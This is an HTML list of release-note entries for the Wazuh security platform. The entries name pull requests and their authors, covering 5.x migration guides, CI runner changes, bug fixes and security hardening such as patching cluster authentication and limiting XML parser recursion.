<li>Add guide for migrating manager coordinator from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639020634" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36829" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36829/hovercard" href="https://github.com/wazuh/wazuh/pull/36829">#36829</a></li>
<li>Add Wazuh Manager Configuration documentation from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4611934920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36779" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36779/hovercard" href="https://github.com/wazuh/wazuh/pull/36779">#36779</a></li>
<li>Add documentation to migrate filebeat to indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664131019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36866/hovercard" href="https://github.com/wazuh/wazuh/pull/36866">#36866</a></li>
<li>wazuh-manager: Benchmark and footprint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456748469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36145" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36145/hovercard" href="https://github.com/wazuh/wazuh/pull/36145">#36145</a></li>
<li>Update manager upgrade block message by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4681713013" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36987" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36987/hovercard" href="https://github.com/wazuh/wazuh/pull/36987">#36987</a></li>
<li>5.x PR workflows improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596503652" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36766" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36766/hovercard" href="https://github.com/wazuh/wazuh/pull/36766">#36766</a></li>
<li>Add Manager 5.0 release notes and breaking changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4648591326" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36850" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36850/hovercard" href="https://github.com/wazuh/wazuh/pull/36850">#36850</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [main] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692375185" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37012" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37012/hovercard" href="https://github.com/wazuh/wazuh/pull/37012">#37012</a></li>
<li>chore: update vulnerable Python framework dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699088509" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37024" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37024/hovercard" href="https://github.com/wazuh/wazuh/pull/37024">#37024</a></li>
<li>Add Manager 5.0 wazuh-manager.conf configuration reference by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691339394" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36999" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36999/hovercard" href="https://github.com/wazuh/wazuh/pull/36999">#36999</a></li>
<li>Add virustotal migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692765810" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37013" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37013/hovercard" href="https://github.com/wazuh/wazuh/pull/37013">#37013</a></li>
<li>Add VD migration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692092118" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37008" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37008/hovercard" href="https://github.com/wazuh/wazuh/pull/37008">#37008</a></li>
<li>Add documentation for wpk upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4693271310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37015" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37015/hovercard" href="https://github.com/wazuh/wazuh/pull/37015">#37015</a></li>
<li>Migrate agent build workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701880741" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37028" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37028/hovercard" href="https://github.com/wazuh/wazuh/pull/37028">#37028</a></li>
<li>XML Decoders migration to YAML by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673566639" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36959" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36959/hovercard" href="https://github.com/wazuh/wazuh/pull/36959">#36959</a></li>
<li>CDB to KVDB migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4690514873" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36996" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36996/hovercard" href="https://github.com/wazuh/wazuh/pull/36996">#36996</a></li>
<li>Documentation of Agentless migration to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699204980" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37025" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37025/hovercard" href="https://github.com/wazuh/wazuh/pull/37025">#37025</a></li>
<li>Fix manager reload/restart silently fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673792785" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36962" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36962/hovercard" href="https://github.com/wazuh/wazuh/pull/36962">#36962</a></li>
<li>Randomize key generation for installation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651010813" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36861" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36861/hovercard" href="https://github.com/wazuh/wazuh/pull/36861">#36861</a></li>
<li>Retry vulnerability feed validation failures promptly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665777430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36874" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36874/hovercard" href="https://github.com/wazuh/wazuh/pull/36874">#36874</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716517657" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37040" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37040/hovercard" href="https://github.com/wazuh/wazuh/pull/37040">#37040</a></li>
<li>Fix agent permanently stuck when TCP connection is silently half-closed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616576722" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36790" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36790/hovercard" href="https://github.com/wazuh/wazuh/pull/36790">#36790</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.6] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692373330" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37010/hovercard" href="https://github.com/wazuh/wazuh/pull/37010">#37010</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.7] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692374310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37011/hovercard" href="https://github.com/wazuh/wazuh/pull/37011">#37011</a></li>
<li>fix: correct blob URL refs for release branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718016446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37046/hovercard" href="https://github.com/wazuh/wazuh/pull/37046">#37046</a></li>
<li>Use restricted wazuh-server user for Manager Indexer authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724661439" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37061" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37061/hovercard" href="https://github.com/wazuh/wazuh/pull/37061">#37061</a></li>
<li>fix(packages): use wazuh-manager-control in manager init.d scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724166255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37059/hovercard" href="https://github.com/wazuh/wazuh/pull/37059">#37059</a></li>
<li>fix: Update the unclassified event doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726479817" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37126" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37126/hovercard" href="https://github.com/wazuh/wazuh/pull/37126">#37126</a></li>
<li>Skip vanished /proc entries during ports scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650163579" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36859" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36859/hovercard" href="https://github.com/wazuh/wazuh/pull/36859">#36859</a></li>
<li>Fix RBAC permission check to verify allow effect in update_config rules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724800552" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37076" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37076/hovercard" href="https://github.com/wazuh/wazuh/pull/37076">#37076</a></li>
<li>Add destination confinement to worker non-merged and extra file sync paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691222179" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36998" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36998/hovercard" href="https://github.com/wazuh/wazuh/pull/36998">#36998</a></li>
<li>Patch cluster authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716191480" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37039" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37039/hovercard" href="https://github.com/wazuh/wazuh/pull/37039">#37039</a></li>
<li>Lower stale-session indexer log to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733981786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37150" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37150/hovercard" href="https://github.com/wazuh/wazuh/pull/37150">#37150</a></li>
<li>Limit recursion depth in XML parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733223430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37147" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37147/hovercard" href="https://github.com/wazuh/wazuh/pull/37147">#37147</a></li>
<li>Add status endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696177149" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37022" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37022/hovercard" href="https://github.com/wazuh/wazuh/pull/37022">#37022</a></li>
<li>Add log collectors reference docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721989446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37057" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37057/hovercard" href="https://github.com/wazuh/wazuh/pull/37057">#37057</a></li>
<li>Run the Windows MSI package test on the AWS CodeBuild runner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738105790" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37165" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37165/hovercard" href="https://github.com/wazuh/wazuh/pull/37165">#37165</a></li>
<li>Remove merged.mg hash cache to fix stale syscollector flush by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720281364" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37048" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37048/hovercard" href="https://github.com/wazuh/wazuh/pull/37048">#37048</a></li>
<li>Enrich MITRE fields with id and names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721520471" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37054" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37054/hovercard" href="https://github.com/wazuh/wazuh/pull/37054">#37054</a></li>
<li>Reduce indexer connection warning noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696113780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37021" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37021/hovercard" href="https://github.com/wazuh/wazuh/pull/37021">#37021</a></li>
<li>Remove deprecated wazuh-dbd daemon by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715728814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37035" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37035/hovercard" href="https://github.com/wazuh/wazuh/pull/37035">#37035</a></li>
<li>Bound decompressed size when processing sync archives by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725313255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37119" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37119/hovercard" href="https://github.com/wazuh/wazuh/pull/37119">#37119</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742531433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37176/hovercard" href="https://github.com/wazuh/wazuh/pull/37176">#37176</a></li>
<li>Add libcrypt fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a>) to 4.14.6 changelog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743056771" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37178" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37178/hovercard" href="https://github.com/wazuh/wazuh/pull/37178">#37178</a></li>
<li>Delay IndexerDownloader connection warnings until 3 failed attempts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742582733" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37177" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37177/hovercard" href="https://github.com/wazuh/wazuh/pull/37177">#37177</a></li>
<li>Add parameterized target selection to Coverity scan workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740074465" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37171" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37171/hovercard" href="https://github.com/wazuh/wazuh/pull/37171">#37171</a></li>
<li>Align remoted tier 2 CodeBuild setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735418555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37155" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37155/hovercard" href="https://github.com/wazuh/wazuh/pull/37155">#37155</a></li>
<li>Add rules migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jorgesnchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jorgesnchz">@Jorgesnchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495888102" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36305" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36305/hovercard" href="https://github.com/wazuh/wazuh/pull/36305">#36305</a></li>
<li>Migrate agent Linux/Windows test workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720554249" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37051" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37051/hovercard" href="https://github.com/wazuh/wazuh/pull/37051">#37051</a></li>
<li>Silence spurious keepalive warnings on the Windows agent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745531717" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37187" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37187/hovercard" href="https://github.com/wazuh/wazuh/pull/37187">#37187</a></li>
<li>wazuh-engine: Improve log messages and logger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4688784533" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36995" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36995/hovercard" href="https://github.com/wazuh/wazuh/pull/36995">#36995</a></li>
<li>Set default indexer connector credentials by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746445718" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37192" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37192/hovercard" href="https://github.com/wazuh/wazuh/pull/37192">#37192</a></li>
